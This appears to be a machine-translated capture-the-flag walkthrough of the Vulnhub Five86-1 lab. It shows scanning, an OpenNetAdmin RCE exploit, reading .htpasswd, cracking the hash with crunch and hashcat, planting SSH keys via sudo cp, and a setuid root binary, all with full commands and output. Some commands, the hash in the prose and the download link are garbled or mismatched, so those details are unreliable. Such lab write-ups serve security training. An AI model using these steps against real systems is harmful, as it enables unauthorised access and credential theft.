Vulnhub customs clearance manual - 04 Five86-1
Background overview:
The download address is: https://www.vulnhub.com/entry/dc-1-1,292/
The target IP is 100.10 10.133, add the IP address to the hosts file and map it to the domain name five86 local
Technical points:
- opennetadmin exploit
- find / -type f -user username view the files that can be read by this username
- Use hash identifier to view the encryption method
- Generating dictionaries using crunch
- Password cracking using hashcat tool
1. Information collection
1.1 scan target host IP
Use the ARP scan - L command to scan the inventory host within the LAN.
└─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 100.10.10.129 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 100.10.10.1 00:50:56:c0:00:08 VMware, Inc. 100.10.10.133 00:0c:29:c3:7a:e0 VMware, Inc. 100.10.10.253 00:50:56:fd:dd:e0 VMware, Inc. 100.10.10.254 00:50:56:e1:62:61 VMware, Inc.
According to the MAC address comparison, it is known that the IP of the target host is 100.10 10.133.
1.2 scan open port of target host
Use the command nmap - SS - PN - P 1-65535 100.10 10.133 detect the open port of the target host.
└─# nmap -sS -Pn -p 1-65535 100.10.10.133 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-29 09:05 CST Stats: 0:00:07 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan Parallel DNS resolution of 1 host. Timing: About 0.00% done Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan Parallel DNS resolution of 1 host. Timing: About 0.00% done Nmap scan report for 100.10.10.133 Host is up (0.0010s latency). Not shown: 65532 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 10000/tcp open snet-sensor-mgmt MAC Address: 00:0C:29:C3:7A:E0 (VMware) Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
According to the scanning results, the open ports of the target host are 22, 80 and 10000.
1.3 directory scanning
Using the command dirb http://five86.local Perform a directory scan.
└─# dirb http://five86.local
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Dec 29 16:00:23 2021
URL_BASE: http://five86.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://five86.local/ ----
+ http://five86.local/index.html (CODE:200|SIZE:30)
+ http://five86.local/reports (CODE:401|SIZE:459)
+ http://five86.local/robots.txt (CODE:200|SIZE:29)
+ http://five86.local/server-status (CODE:403|SIZE:277)
-----------------
END_TIME: Wed Dec 29 16:00:30 2021
DOWNLOADED: 4612 - FOUND: 4
According to the scanning results, the above directories exist.
2. Web site detection
2.1 getShell
Login website http://five86.local , found nothing. open http://five86.local/robots.txt , as shown below.
User-agent: *
Disallow: /ona
This guesses that there is a hidden directory http://five86.local/ona , open the web page and find that it is the management page of opennetadmin, and the version is 18.1 1.
Collecting relevant information online, it is found that there is an RCE vulnerability in this version. exp download as follows.
https://github.com/amriunix/ona-rce
Use the command cat ona rce Py to see what parameters are required to use this exp.
print("\n[-] Usage: python3 " + filename + " [check | exploit] <URL>")
Use the command Python 3 ona rce py exploit http://five86.local/ona/ , get the shell of the target host.
└─# python3 ona-rce.py exploit http://five86.local/ona [*] OpenNetAdmin 18.1.1 - Remote Code Execution [+] Connecting ! [+] Connected Successfully! sh$
2.2 password cracking
After some tests, the commands that cannot be executed normally cannot be echoed, for example, the cd command cannot be executed. Try another command.
sh$ uname -a Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 GNU/Linux sh$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) sh$ whoami www-data
Use the command find / - type F - user www data to view the files that the user can read.
...... /var/www/html/reports/.htaccess find: '/var/log/private': Permission denied find: '/var/log/apache2': Permission denied find: '/var/log/mysql': Permission denied find: '/var/log/exim4': Permission denied /var/log/ona.log ......
The directory files that can be accessed are / var / www / HTML / reports / Htaccess and / var / log / ona log.
Visit / var / www / HTML / reports / Htaccess file to view the contents.
sh$ cat /var/www/html/reports/.htaccess AuthType Basic AuthName "Restricted Area" AuthUserFile /var/www/.htpasswd require valid-user
Found a hidden path / var / www / Htpasswd to access the file.
sh$ cat /var/www/.htpasswd douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 # To make things slightly less painful (a standard dictionary will likely fail), # use the following character set for this 10 character password: aefhrt
Get the user name douglas and the encrypted password $apr1fgG/hiM$BtsL9qpNHUlylaLxk81qY1. The prompt content is 10 characters including aefhrt.
Use hash identifier to see what encryption method is.
└─# hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: $apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 Possible Hashs: [+] MD5(APR) --------------------------------------------------
It can be seen that MD5(ARP) encryption is used.
Use crunch to generate the corresponding dictionary file pass Txt, the command is crunch 10 10 aefhrt - O pass txt.
└─# crunch 10 10 aefhrt -o pass.txt Crunch will now generate the following amount of data: 665127936 bytes 634 MB 0 GB 0 TB 0 PB Crunch will now generate the following number of lines: 60466176 crunch: 21% completed generating output crunch: 46% completed generating output crunch: 60% completed generating output crunch: 81% completed generating output crunch: 100% completed generating output
Use hashcat tool to crack the encrypted password. The command is hashcat - M 1600 - a 0 - O res hash txt pass. txt.
When running on kali, an error will be reported, which is run in wls.
The final password is fatherrrr.
2.3 SSH Remote Login
2.3.1 douglas user
Using the command ssh douglas@100.10.10.133 Make a remote connection.
└─# ssh douglas@100.10.10.133 douglas@100.10.10.133's password: Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Dec 28 21:26:43 2021 from 100.10.10.129 douglas@five86-1:~$
This is a TTY, but there are still permission restrictions. Use the sudo -l command to see which commands can be used.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
The result is the cp command of the jen user.
If / home / jen / ssh/authorized_ Keys contains douglas's public key, so you can use douglas's id_rsa file login to jen's SSH, that is, the SSH of non secret login to jen. It is copied to the / tmp directory because jen does not have permission to access the files in the douglas directory.
Use the following command.
cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys chmod 777 /tmp/authorized_keys sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
2.3.2 jen users
Use ssh to log in the Jen user. The command is ssh - I ID_ rsa jen@127.0.0.1 .
douglas@five86-1:~$ ssh -i id_rsa jen@127.0.0.1 Warning: Identity file id_rsa not accessible: No such file or directory. Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. You have mail. Last login: Tue Dec 28 21:36:24 2021 from 127.0.0.1 jen@five86-1:~$
Use the command find / -type f -user jen to view the files that the current user can read.
...... /var/mail/jen ......
View the file.
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
To: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
You can know the user name moss and password fire through this email! Fire!.
2.3.3 moss users
Using the command ssh moss@127.0.0.1 Sign in.
jen@five86-1:~$ ssh moss@127.0.0.1 moss@127.0.0.1's password: Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Dec 28 21:43:08 2021 from 127.0.0.1 moss@five86-1:~$
Use the ls -la command to view all files in the current folder.
moss@five86-1:~$ ls -al total 12 drwx------ 3 moss moss 4096 Jan 1 2020 . drwxr-xr-x 7 root root 4096 Jan 1 2020 .. lrwxrwxrwx 1 moss moss 9 Jan 1 2020 .bash_history -> /dev/null drwx------ 2 moss moss 4096 Jan 1 2020 .games
A hidden folder was found games.
Enter the folder and view all files again. A binary file upyourgame with root permission was found.
After running this file, it magically becomes root.
moss@five86-1:~/.games$ ./upyourgame Would you like to play a game? yes Could you please repeat that? yes Nope, you'll need to enter that again. yes You entered: No. Is this correct? no We appear to have a problem? Do we have a problem? no Made in Britain. # whoami root # id uid=0(root) gid=1001(moss) groups=1001(moss) # cd /root # ls flag.txt # cat flag.txt 8f3b38dd95eccf600593da4522251746
Get the flag!